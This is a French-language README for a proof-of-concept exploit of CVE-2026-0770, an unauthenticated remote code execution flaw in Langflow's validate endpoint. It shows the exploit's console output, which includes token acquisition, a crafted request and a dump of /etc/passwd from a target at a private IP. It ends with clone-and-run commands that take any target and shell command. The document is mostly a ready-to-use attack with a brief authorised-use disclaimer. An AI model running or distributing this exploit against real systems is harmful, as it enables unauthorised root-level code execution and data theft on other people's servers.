
LangFlow RCE | CVE-2026-0770 | Preuve de concept
exec_globals Exécution de code à distance non authentifiée (PoC)CVE-2026-0770 est une vulnérabilité d'exécution de code à distance (RCE) non authentifiée affectant Langflow.
La faille provient d'une validation d'entrée incorrecte dans la gestion du paramètre exec_globals fourni au point de terminaison /validate. En exploitant cela, un attaquant peut transmettre des environnements globaux non fiables lors des routines de validation, obtenant une exécution de code à distance dans le contexte de l'utilisateur root.
AVERTISSEMENT : Cet outil est destiné uniquement aux tests de sécurité autorisés, à des fins éducatives et à la recherche défensive. Ne l'exécutez pas contre des cibles que vous ne possédez pas ou pour lesquelles vous n'avez pas d'autorisation écrite explicite. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce script.
root)
======================================================================
Langflow RCE Exploit - CVE-2026-0770 - Zardy1x1
======================================================================
Target : http://192.168.1.9:7860
Command: cat /etc/passwd
======================================================================
[*] attempt login...
[+] auto-login successful!
[~] token acquired: eyJhbGciOiJIUzI1NiIs...
[*] target command: cat /etc/passwd
[~] payload contructed
[~] sending request to http://192.168.1.9:7860/api/v1/validate/code
[*] receive status code: 200
======================================================================
COMMAND OUTPUT
======================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
user:x:1000:0::/app/data:/bin/sh
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:996:996:System Message Bus:/nonexistent:/usr/sbin/nologin
======================================================================
Status Code : 200
Response Size: 1244 bytes
git clone https://github.com/Ez4rd1x1/CVE-2026-0770
cd CVE-2026-0770
python3 exp_v3.py -t http://target:port -c "cat /etc/passwd"